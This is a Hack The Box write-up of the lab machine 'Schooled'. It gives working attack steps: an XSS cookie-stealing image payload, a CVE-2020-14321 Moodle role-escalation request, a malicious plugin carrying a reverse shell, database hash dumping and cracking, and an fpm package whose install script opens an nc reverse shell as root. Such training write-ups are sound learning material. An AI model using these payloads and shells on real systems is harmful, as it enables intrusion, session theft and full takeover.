18th September 2021
Hack The Box Schooled Write-Up by T13nn3s

Hack The Box Write-Up Schooled –

The most powerful motivation is rejection.


About Schooled

In this post, I’m writing a write-up for the machine Schooled from Hack The Box. Hack The Box is an online platform to train your ethical hacking skills and penetration testing skills.

Schooled is an ‘Medium’ rated box. Grabbing and submitting the user.txt flag, your points will be raised by 15, and submitting the root flag your points will be raised by 30.

After the initial port scan with Nmap, we have discovered the two open ports 22/tcp and 80/tcp. The foothold of this machine leans very on enumeration. After doing a heavy enumeration process on the website, we can find a subdomain on moodle.schooled.htb. Through this learning platform, we can steal the cookie of the teacher Manuel Phillips, and from his account, we can do a privilege escalation to the Manager role to upload a malicious plugin, which is containing a reverse shell.

Through the reverse shell, we are authenticated as the user account www. We need to do a lateral movement to the user account Jamie. Moodle is using MySQL, and in the config.php file, we can find the credentials to this database. After dumping the mdl_user table, we can use hascat to crack the password from the user account Jamie. Through an SSH session to this machine, with the account from Jamie, we are able to grab the user flag.

Jamie has the permissions to install packages as root. With fpm (Effing Package Management) we are able to create a custom package with a reverse shell payload in it. After installing the package, the reverse shell is being established and we are able to read the root flag.

Machine Info

Hack The Box Schooled Write-Up by T13nn3s
Hack The Box Schooled Write-Up by T13nn3s
Hack The Box Schooled Machine IP and maker
Hack The Box Schooled Machine IP and Maker


Port scan with Nmap

As always we start this machine with a port scan with Nmap.

~$ nmap -sC -sV -oA ./nmap/ 

The results of the port scan.

Starting Nmap 7.90SVN ( https://nmap.org ) at 2021-05-07 21:35 CEST
Nmap scan report for
Host is up (0.27s latency).
Not shown: 998 closed ports
22/tcp open  ssh     OpenSSH 7.9 (FreeBSD 20200214; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.46 ((FreeBSD) PHP/7.4.15)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.46 (FreeBSD) PHP/7.4.15
|_http-title: Schooled - A new kind of educational institute
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd

The port scan had discovered two open ports. The first one is the default SSH port 22/tcp and the second one is the default HTTP port 80/tcp. According to the results, there is already one potential risk found, the TRACE method is allowed. We will keep this in our mind. There is a website running on this server with the HTTP title A new kind of educational institute. This machine is running FreeBSD as the operating system.

Enumeration Web Server

We start with the enumeration of the web server. With ffuf we can fuzz for web directories, some default directories are showing up, but nothing special so far.

~$ ffuf -c -w ../../wordlists/wfuzz/general/big.txt -u                                           
         /'___\  /'___\           /'___\                                                                                                                
        /\ \__/ /\ \__/  __  __  /\ \__/                                                                                                                
        \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\                                                                                                               
         \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/                                                                                                               
          \ \_\   \ \_\  \ \____/  \ \_\                                                                                                                
           \/_/    \/_/   \/___/    \/_/                                                                                                                


:: Method           : GET                                                 
:: URL              :                                                                                                        
:: Wordlist         : FUZZ: ../../wordlists/wfuzz/general/big.txt                                                                                     
:: Follow redirects : false                                               
:: Calibration      : false                                               
:: Timeout          : 10                                                  
:: Threads          : 40                                                  
:: Matcher          : Response status: 200,204,301,302,307,401,403                                                                                    

css                     [Status: 301, Size: 232, Words: 14, Lines: 8]                                                                                  
fonts                   [Status: 301, Size: 234, Words: 14, Lines: 8]                                                                                  
images                  [Status: 301, Size: 235, Words: 14, Lines: 8]                                                                                  
js                      [Status: 301, Size: 231, Words: 14, Lines: 8]                                                                                  
:: Progress: [3024/3024] :: Job [1/1] :: 323 req/sec :: Duration: [0:00:13] :: Errors: 0 :: 

We can check the website by visiting this URL

Hack The Box Schooled Write-up Website

After clicking some around on this website, we can find the hostname schooled.htb on the webpage Let’s add this hostname to our hosts’ file. There is also an email address exposed to the same webpage [email protected].

The enumeration was a huge challenge for me. After the enumeration of the website, I was not able to find out my next step. From a nudge from another Hack The Box player, I have learned to go beyond enumeration, as this is a very real-life applicable machine. After hist nudge, I had found the subdomain moodle.schooled.htb. Well, what is Moodle? Moodle is the most commonly used open-source learning platform, this the website: https://moodle.org/.

After we have added moodle.schooled.htb to our hosts’ we are able to reach this platform.

Hack The Box Schooled Write-up Moodle

To get more access on this platform we need to register a new user account. We can register a account with the following details:

Username: t13nn3s
Password: [email protected]
Email address: [email protected]
First name: T13nn3s
Last name: Hax0r

After creating the account we can access the Moodle platform, and we can walk through the various courses. What stands out is that we can only enroll the Mathematics course. We cannot enroll the other courses, that has to be by purpose. This course has an announcement, in this announcement the teacher Manual Phillips is talking about the MoodleNet profiles.

Hack The Box Schooled Write-up teacher announcement
Mathemetics announcement

This has to be a hint that we have to do something with our MoodleNet profile. After playing around with the contents of the MoodleNet profile area in our profile settings, we can notice that this teacher Manual Philips is coming online on the platform. Of course, he wants to check our MoodleNet profile. After testing further, we can use HTML markup in the Moodle profile text area. If we can inject some code, to steal the session cookie if the teacher, we can authenticate as the teacher on the platform.


Let’s start doing some preparations to steal the cookie. For this purpose, we are gonna use this cookie stealer: https://github.com/s0wr0b1ndef/WebHacking101/blob/master/XSS-cookie-stealer.py. We start with downloading this Python script to our machine.

~$ curl "https://raw.githubusercontent.com/s0wr0b1ndef/WebHacking101/master/XSS-cookie-stealer.py" -o XSS-cookie-stealer.py

After downloading the script, we need to determine which payload we gonna use. For this machine, we are using the payload below. This payload is creating a fake picture with a cookie stealing payload, and it will send the cookie to our listener on port 80.

<img src=x onerror="this.src=''+document.cookie; this.removeAttribute('onerror');">

We add this payload to our MoodleNet profile text area. After that, we can start the script.

~$ python XSS-cookie-stealer.py
Started HTTP server
2021-05-24 09:48 PM -      Mozilla/5.0 (X11; FreeBSD amd64; rv:86.0) Gecko/20100101 Firefox/86.0
MoodleSession                   ['a78ogjssji7gpvope9mlm0bpn8'] 

After some time of waiting the teacher, Manual Phillips is visiting our profile, and our malicious XSS payload is stealing the cookie from his session. We have directly the cookie from the teacher! After changing this cookie in our internet browser, we are logged in as Manual Phillips.

Hack The Box Schooled Write-up cookie stealing
Logged in as the teacher Manuel Phillips

Our next step is to get access to the machine. Maybe we can find a Remote Execution Vulnerability or something or credentials to access this machine through SSH.



After doing some research on the internet, we can find a privilege escalation vulnerability from the Teachers’ role to the role of Manager, through the users’ enrollment process on a course we can escalate the privileges to the manager role, and then we can get Remote Command Execution on this machine. There is a nice PoC of this vulnerability on YouTube: CVE-2020-14321 PoC. We are gonna use this payload: https://github.com/HoangKien1020/CVE-2020-14321.

This vulnerability is affecting Moodle 3.9. To find which version we have on this machine of Moodle, we can click on the Moodle Docs for this page URL from the footer. This leads us to the documentation of Moodle 3.9, so we can assume that this machine is running Moodle 3.9. Let’s exploit this vulnerability.

First, we need to know the userid from the teachers’ account from manual Philips. We can see the userid in the URL bar from the profile page.

Hack The Box Schooled Write-up privilege escalation
Find the userid from the Teacher

We now know that the userid from this account is 24. The next step is to start the user enrollment process. This phase in this machine has taken me some time, I tried first by enrolling my own account and give it the Manager role will work for the privilege escalation from Teacher to Manager. But that’s not gonna work. After some further enumeration, we can find that Lianne Carter is already manager. So, we need to enroll here account to escalate our privileges to manager.

Hack The Box Schooled Write-Up Lianne Carter
Lianne Carter is a manager

From the course Mathematics we can go to Participants, from the left side in the navigation bar. When we click on Enrol users, we get this popup presented. We can just select a random user account to enroll and make sure that we capture this request with Burp Suite and send this request to Burp Suite’s Repeater.

Hack The Box Schooled Write-Up user enrollment process
Enroll user for CVE-2020-14321

After we have captured his request and sent to Repeater we can modify the parameter userlist to the userid 24, we get: userlist%5B%5D=24. Second, we need to change the roletoassign parameter from 5 to 1. This is our final request.

GET /moodle/enrol/manual/ajax.php?mform_showmore_main=0&id=5&action=enrol&enrolid=10&sesskey=2iWI1C0LmF&_qf__enrol_manual_enrol_users_form=1&mform_showmore_id_main=0&userlist%5B%5D=24&roletoassign=1&startdate=4&duration= HTTP/1.1
Host: moodle.schooled.htb
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:88.0) Gecko/20100101 Firefox/88.0
Accept: /
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/json
X-Requested-With: XMLHttpRequest
DNT: 1
Connection: close
Referer: http://moodle.schooled.htb/moodle/user/index.php?id=5
Cookie: MoodleSession=eqvn4dnk7f4kdqs45vur8ojfkq

Click on Send in Burp Suite and the web server will return an HTTP/1.1 200 OK with this content.


Payload is executed, exploit is done. Our teacher’s account has the Manager’s role. If we are setting a filter on the user account which are holding the Managers’ role, we can see that our teacher has the manager tole now.

Hack The Box Schooled Write-Up jump to manager
Moodle from Teacher to Manager

We can now jump from the user account Manual Philips to Lianne Carter to access the back-end of this server. So, we click on the useraccount Lianne Carter and then click on Log in as, to login as Lianne Carters’ useraccount.

Hack The Box Schooled Write-Up enter backend

From the left navigation bar, we can enter the Site administration. We can directly go to plugins to upload our web shell plugin, but we do not have the permissions to upload a new plugin. So, we need first to tamper with our permissions (again). From this point, we go to Users –> Define roles –> Manager –> Edit, and before clicking on Save changes, we are enabling Burp Suite to intercept the request and replace the request with the full permissions, we can copy and paste it from Github: https://github.com/HoangKien1020/CVE-2020-14321. We have now the permissions to upload our malicious plugin to get a reverse shell.

So, let’s download rce.zip from <link>, the block_rce.php contains a webshell, we do not want to have a webshell, so let’s overwrite the contents with a reverse shell payload.

~$ cat php-reverse-shell.php > block_rce.php

Now, we need to package it back to a zip file.

~$ zip -r rce.zip rce/
adding: rce/ (stored 0%)
adding: rce/version.php (deflated 11%)
adding: rce/lang/ (stored 0%)
adding: rce/lang/en/ (stored 0%)
adding: rce/lang/en/block_rce.php (deflated 59%)

We can upload the rce.zip and after uploading the plugin we see that it got’s validated correctly.

Hack The Box Schooled Write-Up revshell upload
Plugin validated

On the next scren we can click on Continue and then the reverse shell is being established.

Reverse shell as www

netcat -lvvp 4444
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::4444
Ncat: Listening on
Ncat: Connection from
Ncat: Connection from
FreeBSD Schooled 13.0-BETA3 FreeBSD 13.0-BETA3 #0 releng/13.0-n244525-150b4388d3b: Fri Feb 19 04:04:34 UTC 2021     [email protected]:/usr/obj/usr/src/amd64.amd64/sys/GENERIC  amd64
9:19PM  up 29 mins, 0 users, load averages: 0.81, 0.78, 0.58
USER       TTY      FROM    [email protected]  IDLE WHAT
uid=80(www) gid=80(www) groups=80(www)
sh: can't access tty; job control turned off
$ hostname & whoami

Let’s start with upgrading the shell.

$ /usr/local/bin/python3 -c 'import pty; pty.spawn("/bin/bash")'
 [[email protected] /]$

After doing some enumeration on this machine, we can find out that there are two other user accounts on this machine jamie and steve and both of the accounts have permission to open a shell on this machine. Our first job is to find out the database connection settings to the MySQL database of Moodle to find the passwords of the user accounts. We can find the configuration in this file /usr/local/www/apache24/data/moodle/config.php.

[[email protected] /usr/local/www/apache24/data/moodle]$ cat config.php
<?php  // Moodle configuration file
global $CFG;
$CFG = new stdClass();
$CFG->dbtype    = 'mysqli';
$CFG->dblibrary = 'native';
$CFG->dbhost    = 'localhost';
$CFG->dbname    = 'moodle';
$CFG->dbuser    = 'moodle';
$CFG->dbpass    = 'PlaybookMaster2020';
$CFG->prefix    = 'mdl_';

Lateral Movement

Jump from www to jamie

We have now the username and password of the Moodle MySQL database. The next step is to list the tables, to find out which table we need to read the passwords of the user accounts.

[[email protected] /usr/local/www/apache24/data/moodle]$ /usr/local/bin/mysql -u moodle -pPlaybookMaster2020
</usr/local/bin/mysql -u moodle -pPlaybookMaster2020
mysql: [Warning] Using a password on the command line interface can be insecure.
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 334
Server version: 8.0.23 Source distribution

Copyright (c) 2000, 2021, Oracle and/or its affiliates.

Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

[email protected] [(none)]>

Connect to the database of Moodle.

[email protected] [(none)]> use moodle;
use moodle;
Database changed

List all of the tables.

[email protected] [(none)]> show tables;
| mdl_upgrade_log                  |
| mdl_url                          |
| mdl_user                         |
| mdl_user_devices                 |
| mdl_workshopform_rubric_levels   |
428 rows in set (0.00 sec)
[email protected] [moodle]>

Hmm, mdl_user is an interesting table. Let’s list the firstname, username and passwords from the user accounts.

[email protected] [moodle]> select firstname,username,password from mdl_user;
select firstname,username,password from mdl_user;
| firstname  | username          | password                                                     |
| Guest user | guest             | $2y$10$u8DkSWjhZnQhBk1a0g1ug.x79uhkx/sa7euU8TI4FX4TCaXK6uQk2 |
| Jamie      | admin             | $2y$10$3D/gznFHdpV6PXt1cLPhX.ViTgs87DCE5KqphQhGYR5GFbcl4qTiW |
| Oliver     | bell_oliver89     | $2y$10$N0feGGafBvl.g6LNBKXPVOpkvs8y/axSPyXb46HiFP3C9c42dhvgK |
| Sheila     | orchid_sheila89   | $2y$10$YMsy0e4x4vKq7HxMsDk.OehnmAcc8tFa0lzj5b1Zc8IhqZx03aryC |
| Elizabeth  | chard_ellzabeth89 | $2y$10$D0Hu9XehYbTxNsf/uZrxXeRp/6pmT1/6A.Q2CZhbR26lCPtf68wUC |
| Jake       | morris_jake89     | $2y$10$UieCKjut2IMiglWqRCkSzerF.8AnR8NtOLFmDUcQa90lair7LndRy |
| James      | heel_james89      | $2y$10$sjk.jJKsfnLG4r5rYytMge4sJWj4ZY8xeWRIrepPJ8oWlynRc9Eim |
| Michael    | nash_michael89    | $2y$10$yShrS/zCD1Uoy0JMZPCDB.saWGsPUrPyQZ4eAS50jGZUp8zsqF8tu |
| Rakesh     | singh_rakesh89    | $2y$10$Yd52KrjMGJwPUeDQRU7wNu6xjTMobTWq3eEzMWeA2KsfAPAcHSUPu |
| Marcus     | taint_marcus89    | $2y$10$kFO4L15Elng2Z2R4cCkbdOHyh5rKwnG4csQ0gWUeu2bJGt4Mxswoa |
| Shaun      | walls_shaun89     | $2y$10$EDXwQZ9Dp6UNHjAF.ZXY2uKV5NBjNBiLx/WnwHiQ87Dk90yZHf3ga |
| John       | smith_john89      | $2y$10$YRdwHxfstP0on0Yzd2jkNe/YE/9PDv/YC2aVtC97mz5RZnqsZ/5Em |
| Jack       | white_jack89      | $2y$10$PRy8LErZpSKT7YuSxlWntOWK/5LmSEPYLafDd13Nv36MxlT5yOZqK |
| Carl       | travis_carl89     | $2y$10$VO/MiMUhZGoZmWiY7jQxz.Gu8xeThHXCczYB0nYsZr7J5PZ95gj9S |
| Amy        | mac_amy89         | $2y$10$PgOU/KKquLGxowyzPCUsi.QRTUIrPETU7q1DEDv2Dt.xAjPlTGK3i |
| Boris      | james_boris89     | $2y$10$N4hGccQNNM9oWJOm2uy1LuN50EtVcba/1MgsQ9P/hcwErzAYUtzWq |
| Allan      | pierce_allan      | $2y$10$ia9fKz9.arKUUBbaGo2FM.b7n/QU1WDAFRafgD6j7uXtzQxLyR3Zy |
| William    | henry_william89   | $2y$10$qj67d57dL/XzjCgE0qD1i.ION66fK0TgwCFou9yT6jbR7pFRXHmIu |
| Zoe        | harper_zoe89      | $2y$10$mnYTPvYjDwQtQuZ9etlFmeiuIqTiYxVYkmruFIh4rWFkC3V1Y0zPy |
| Travis     | wright_travis89   | $2y$10$XFE/IKSMPg21lenhEfUoVemf4OrtLEL6w2kLIJdYceOOivRB7wnpm |
| Matthew    | allen_matthew89   | $2y$10$kFYnbkwG.vqrorLlAz6hT.p0RqvBwZK2kiHT9v3SHGa8XTCKbwTZq |
| Wallis     | sanders_wallis89  | $2y$10$br9VzK6V17zJttyB8jK9Tub/1l2h7mgX1E3qcUbLL.GY.JtIBDG5u |
| Jane       | higgins_jane      | $2y$10$n9SrsMwmiU.egHN60RleAOauTK2XShvjsCS0tAR6m54hR1Bba6ni2 |
| Manuel     | phillips_manuel   | $2y$10$ZwxEs65Q0gO8rN8zpVGU2eYDvAoVmWYYEhHBPovIHr8HZGBvEYEYG |
 | Lianne     | carter_lianne     | $2y$10$jw.KgN/SIpG2MAKvW8qdiub67JD7STqIER1VeRvAH4fs/DPF57JZe |
 | Dan        | parker_dan89      | $2y$10$MYvrCS5ykPXX0pjVuCGZOOPxgj.fiQAZXyufW5itreQEc2IB2.OSi |
 | Tim        | parker_tim89      | $2y$10$YCYp8F91YdvY2QCg3Cl5r.jzYxMwkwEm/QBGYIs.apyeCeRD7OD6S |
 | T13nn3s    | t13nn3s           | $2y$10$B7soGevkdFNmPNTQddEH1.9.JMfldy/mS5PlXw7wTe/oncl/ZqMWO |
 28 rows in set (0.00 sec)
 [email protected] [moodle]> 

The user Jamie has the username admin, that’s intereseting. Let’s give his password hash to hashcat.

~$ hashcat -a 0 -m 3200 jamie-hash /usr/share/wordlists/rockyou.txt

After letting hashcat running for a while, we get the following password.


We got a password! Now, let’s try to get SSH access.

~$ ssh [email protected]
The authenticity of host 'moodle.schooled.htb (' can't be established.
ECDSA key fingerprint is SHA256:BiWc+ARPWyYTueBR7SHXcDYRuGsJ60y1fPuKakCZYDc.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'moodle.schooled.htb,' (ECDSA) to the list of known hosts.
Password for [email protected]:
Last login: Tue Mar 16 14:44:53 2021 from
FreeBSD 13.0-BETA3 (GENERIC) #0 releng/13.0-n244525-150b4388d3b: Fri Feb 19 04:04:34 UTC 2021

Welcome to FreeBSD!

Release Notes, Errata: https://www.FreeBSD.org/releases/
Security Advisories:   https://www.FreeBSD.org/security/
FreeBSD Handbook:      https://www.FreeBSD.org/handbook/
FreeBSD FAQ:           https://www.FreeBSD.org/faq/
Questions List: https://lists.FreeBSD.org/mailman/listinfo/freebsd-questions/
FreeBSD Forums:        https://forums.FreeBSD.org/

Documents installed with the system are in the /usr/local/share/doc/freebsd/
directory, or can be installed later with:  pkg install en-freebsd-doc
For other languages, replace "en" with a language code like de or fr.

Show the version of FreeBSD installed:  freebsd-version ; uname -a
Please include that output and any error messages when posting questions.
Introduction to manual pages:  man man
FreeBSD directory layout:      man hier

To change this login announcement, see motd(5).
Can't delete /usr/obj? Enter "chflags -R noschg /usr/obj" to remove the
system immutable flag for all files in /usr/obj.
            -- Lars Engels <[email protected]>[email protected]:~ $ cat user.txt 

Yes! We got user, now the next phase: Privilege Escalation.

Privilege Escalation


Always the first check: which privileges has the current user account.

[email protected]:~ $ sudo -l
User jamie may run the following commands on Schooled:
    (ALL) NOPASSWD: /usr/sbin/pkg update
    (ALL) NOPASSWD: /usr/sbin/pkg install *

So, this user has the sudo privileges to install custom packages. After doing some research, we came across this page with some instructions. We only have to change our payload. In the end, this is the payload we have used, we have placed this payload in the /tmp directory. We used this reverse shell payload because nc is installed on this machine.

With the program fpm, we can create a custom package with a reverse shell.

~$ gem install --no-document fpm
~$ TF=$(mktemp -d)
~$ echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 5555 >/tmp/f' > $TF/x.sh
~$ fpm -n x -s dir -t freebsd -a all --before-install $TF/x.sh $TF

Own Schooled

After creating the package, we can download this package to the machine, and install the package to establish the reverse shell with root privileges.

[email protected]:/tmp $ sudo pkg install -y --no-repo-update ./x-1.0.txz
pkg: Repository FreeBSD has a wrong packagesite, need to re-create database
pkg: Repository FreeBSD cannot be opened. 'pkg update' required
Checking integrity… done (0 conflicting)
The following 1 package(s) will be affected (of 0 checked):
New packages to be INSTALLED:
        x: 1.0
Number of packages to be installed: 1
[1/1] Installing x-1.0…
rm: /tmp/f: No such file or directory
[email protected]:/tmp $ sudo pkg install -y --no-repo-update ./x-1.0.txz

The reverse shell is established, and we are able to read the root flag.

netcat -lvvp 5555
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::5555
Ncat: Listening on
Ncat: Connection from
Ncat: Connection from
hostname && whoami
cat /root/root.txt

Thanks for reading this write-up! I have really enjoyed this machine. Did you like this write-up? Please consider spending a respect point, my HTB profile: https://app.hackthebox.eu/profile/224856.

Happy Hacking! 🙂


I'm a cybersecurity enthusiast! I'm working as an IT Security Engineer for a company in The Netherlands. I love writing scripts and doing research and pentesting. As a big fan of Hack The Box, I share my write-ups on this blog. I'm blogging because I like to summarize my thoughts and share them with you.

View all posts by T13nn3s →

Leave a Reply

Your email address will not be published. Required fields are marked *